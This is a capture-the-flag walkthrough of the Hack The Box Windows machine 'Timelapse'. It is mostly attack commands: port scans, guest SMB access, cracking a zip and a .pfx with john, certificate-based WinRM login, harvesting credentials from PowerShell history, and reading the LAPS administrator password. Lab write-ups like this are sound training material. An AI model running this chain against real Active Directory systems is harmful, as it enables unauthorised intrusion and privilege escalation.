TimelapseMarch 15, 2025 Created by Page Difficulty OS ctrlzero Hack The Box Easy Windows I start with a scan of the open ports and I continue with a scan of the versions and technologies that are running on the open ports that we have found nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.152 -oG scan /opt/extractports scan nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49695,49727 -sCV -Pn 10.10.11.152 -oN ports I found the domains dc01.timelapse.htb and timelapse.htb, I added it to the hosts file I begin by listing the resources shared by smb using null credentials. They allow me to observe that I have reading permissions on the “Shares” folder. Inside it I find a zip file. I download it and see that it requires a password to extract its contents. netexec smb 10.10.11.152 -u Guest -p "" --shares smbclient -U 'Guest' //10.10.11.152/Shares I extract the hash and with john I get the password to extract the files. zip2john winrm_backup.zip > ziphash john -w=/usr/share/wordlists/rockyou.txt ziphash I manage to extract a .pfx file that is password protected. I extract the hash and again with john I get to see the password of the file. pfx2john legacyy_dev_auth.pfx > hashpfx john -w=/usr/share/wordlists/rockyou.txt hashpfx At this point I can extract the SSL certificate in PKCS#12 format and the private key. openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out key.pem openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem With these files I can use them to connect via winrm to the system. I get access and get the first flag. evil-winrm -i 10.10.11.152 -c cert.pem -k key.pem -S -r timelapse.htb I list the system thanks to Sharphound and then look at potential privilege escalation paths with bloodhound. I collect the information but I don’t observe anything by relieving. .\SharpHound.exe -c All --zipfilename info I decide to consult the history of executed powrshell commands and inside it I find the credentials of the user svc_deploy. I validate them with netexec and confirm that they are correct. foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue} In the first part of the recognition we have seen that the system has port 5986 open and thanks to this we can connect to the system through WINRM indicating that we want to use SSL. evil-winrm -S -i 10.10.11.152 -u svc_deploy -p 'E3XXXXXXXXXXXXXXXXXuaV' Once inside the system we consult the information related to this user and we observe that it belongs to the group LAPS_Readers, “Local Administrator Password Solution” (LAPS). This group is used to manage the passwords of the DC computers. We can retrieve the administrator password. To recover the password we can make a query on the Active Directory computer. info <active-directory-computer-name> => (Get-ADComputer -Identity $env:COMPUTERNAME).Name #Get-ADComputer -Identity '<active-directory-computer-name>' -property 'ms-mcs-admpwd' Get-ADComputer -Identity 'DC01' -property 'ms-mcs-admpwd' Another way to extract the LAPS password would be through netexec. netexec smb 10.10.11.152 -u svc_deploy -p 'E3XXXXXXXXXXXXXXXXXuaV' --laps Administrator Having the password we can connect to the system as administrator and we can read the second flag. evil-winrm -S -i 10.10.11.152 -u administrator -p '6JXXXXXXXXXXXp5'